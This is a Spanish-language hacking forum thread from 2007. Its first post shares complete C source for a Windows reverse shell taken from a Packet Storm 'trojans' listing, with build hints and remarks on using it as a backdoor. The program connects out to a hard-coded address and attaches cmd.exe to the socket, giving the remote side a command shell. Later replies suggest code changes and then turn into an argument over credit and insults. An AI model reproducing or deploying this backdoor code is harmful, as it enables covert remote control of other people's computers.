elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.
 
Inicio Ayuda Buscar Ingresar Registrarse
29 Mayo 2012, 03:03  


Tema destacado: Suscripción al boletín mensual de elhacker.net

+  Foro de elhacker.net
|-+  Programación
| |-+  Programación C/C++ (Moderadores: Eternal Idol, Littlehorse)
| | |-+  ReverseSHell (SOURCE)		 0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: ReverseSHell (SOURCE)  (Leído 1,519 veces)
EvilGoblin


Desconectado Desconectado

Mensajes: 2.320


YO NO LA VOTE!


Ver Perfil
ReverseSHell (SOURCE)
« en: 27 Septiembre 2007, 17:37 »
Bueno.. lo tenia por ahi ;D seguramente ya lo deben tener muchos

Espero q sirva....
CODIGO FUENTE DE Lympex
URL: http://packetstormsecurity.org/trojans/Evil.Shell.Backdoor_1.0.5.c
Código
#include <stdio.h>
#include <winsock2.h>
 
 
int ReverseShell(char *Ip, short port);
 
WSADATA wsaData;
SOCKET Winsock;
SOCKET Sock;
 
struct sockaddr_in Winsock_In;
 
STARTUPINFO start_proc; 
PROCESS_INFORMATION info_proc;
 
int main(int argc, char *argv[])
{
 
    ReverseShell("192.168.1.5", 3200);
    system("PAUSE");
    return EXIT_SUCCESS;
}
 
 
 
 
 
int ReverseShell(char *Ip, short port)
{
/*=========================================
A la escucha...
=========================================*/
printf("\n[+] Creando el Socket...");
/*iniciamos el socket*/
WSAStartup(MAKEWORD(2,2), &wsaData);
/*asociamos*/
//Winsock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);/*Usamos WSASocket en vez de Socket....*/
Winsock=WSASocket(AF_INET,SOCK_STREAM,IPPROTO_TCP,NULL,(unsigned int)NULL,(unsigned int)NULL);
//IP y PUERTO
Winsock_In.sin_port=htons(port);
Winsock_In.sin_family=AF_INET;
Winsock_In.sin_addr.s_addr=inet_addr(Ip);
 
if(Winsock==INVALID_SOCKET)
{
//printf("ERROR");
 
//Error.. .salimos
printf("\n[+] Cerrando socket...");
WSACleanup();
printf("OK\n");
return 1;
}else{
printf("OK");
}
 
printf("\n[+] Conectando con %s:%d...",Ip,port);
//Conectamos....
if(WSAConnect(Winsock,(SOCKADDR*)&Winsock_In,sizeof(Winsock_In),NULL,NULL,NULL,NULL)==SOCKET_ERROR)
{
//printf("ERROR");
 
// Error.. Salimos
printf("\n[+] Cerrando socket...");
WSACleanup();
printf("OK\n");
return 1;
}else{
printf("OK");
}
 
 
 
printf("OK");
send(Winsock,"\n",strlen("\n"),0);
 
 
printf("\n[+] Lanzando shell...");
 
/*=========================================
             LANZAMOS.....
=========================================*/
//rellenamos la estructura
memset(&start_proc,0,sizeof(start_proc));//limpiamos
start_proc.cb=sizeof(start_proc);
start_proc.dwFlags=STARTF_USESTDHANDLES;
start_proc.hStdInput = start_proc.hStdOutput = start_proc.hStdError = (HANDLE)Winsock;
//lanzamos la shell
if(CreateProcess(NULL,"cmd.exe",NULL,NULL,TRUE,0,NULL,NULL,&start_proc,&info_proc)==0)
{
//printf("ERROR");
 
// salimos
printf("\n[+] Cerrando socket...");
WSACleanup();
printf("OK\n");
return 1;
}else{
printf("OK\n");
}
 
return 0;
}


Es para WINDOWS NT XP 2003 ..

pork tiene cmd.exe

sino iria command.exe

=P

Si lo van a usar como Backdoor  puede q tenar algun error y vaya pidiendo mas recursos cada vez se e ejecuta xDD

y tengan cuidado con WSAStart y WSACleanup
^^

Agregen libws2_32.a al compilar


« Última modificación: 28 Septiembre 2007, 13:52 por (^.^)" EvilGoblin » En línea
Experimental Serial Lain [Linux User]
Rozor

Desconectado Desconectado

Mensajes: 269


As I Walk Through The Valley Of The Shadow Of Dead


Ver Perfil WWW
Re: ReverseSHell (SOURCE)
« Respuesta #1 en: 28 Septiembre 2007, 00:35 »
He leido ya cosillas tuyas ;)

Aunque yo en vez de "(HANDLE)" hubiese usado "(void *)".

Tambien otra forma seria creando las tuberias.

Y algo que te puede servir en este source, haz un puntero a funcion y usalo como retorno, ayer u hoy respondi algo por el estilo aqui. Asi no vuelve a main, luego usas exitprocess y ya esta.

Y si no vas a usar los argumentos no los declares o ponle un maximo a argc.
En línea
out in the streets they call it murder....
EvilGoblin


Desconectado Desconectado

Mensajes: 2.320


YO NO LA VOTE!


Ver Perfil
Re: ReverseSHell (SOURCE)
« Respuesta #2 en: 28 Septiembre 2007, 13:37 »
Cita de: Lympex en 28 Septiembre 2007, 04:09
No me importa que los niñatos como tú copien codigo, mientras no sea mio, pero si es mio, por lo menos menciona las fuentes, GILIPOYAS!

http://packetstormsecurity.org/trojans/Evil.Shell.Backdoor_1.0.5.c

A demás, no funciona en esos SO que has mencionado, en WinXP SP2 por ejemplo, no funciona.

Y me reitero, GILIPOYAS.

La verdad te pido disculpas... yo solo tenia esta parte del codigo que me lo pasaron... no tenia idea si era tuyo o de quien..... en ningun momento me lo adjudique como q lo hice..

pero igual te pido disculpas....no era mi intencion


Tengo XP SP2 y me ha funcionado -.-
« Última modificación: 28 Septiembre 2007, 13:52 por (^.^)" EvilGoblin » En línea
Experimental Serial Lain [Linux User]
invisible_hack


Desconectado Desconectado

Mensajes: 981


Invisible_Hack™ Nick Registrado ^^


Ver Perfil WWW
Re: ReverseSHell (SOURCE)
« Respuesta #3 en: 28 Septiembre 2007, 22:40 »
Citar
Y me reitero, GILIPOYAS.

Bueno, independientemente de que sea o no sea tuyo el code, ese no es motivo para insultar de esa manera a nadie.... :¬¬

Además ya te ha pedido disculpas....asi que....trankilizate tio...

Saludos...
En línea
"Si no visitas mi blog, Chuck te dará una patada giratoria"
sch3m4
Colaborador
***
Desconectado Desconectado

Mensajes: 1.603

Nihil est in intelectu quod prius not fuerit insen


Ver Perfil WWW
Re: ReverseSHell (SOURCE)
« Respuesta #4 en: 28 Septiembre 2007, 23:04 »
Como insulte lo decidiré yo según me moleste, como es lo normal. Y despues de que me pidiera disculpas no he dicho nada mas, y mi post ya está borrado.

PD: (^.^)" EvilGoblin,  ;)
En línea
OpenSec

"Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua.(..
Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  
Powered by SMF 1.1.16 | SMF © 2006-2008, Simple Machines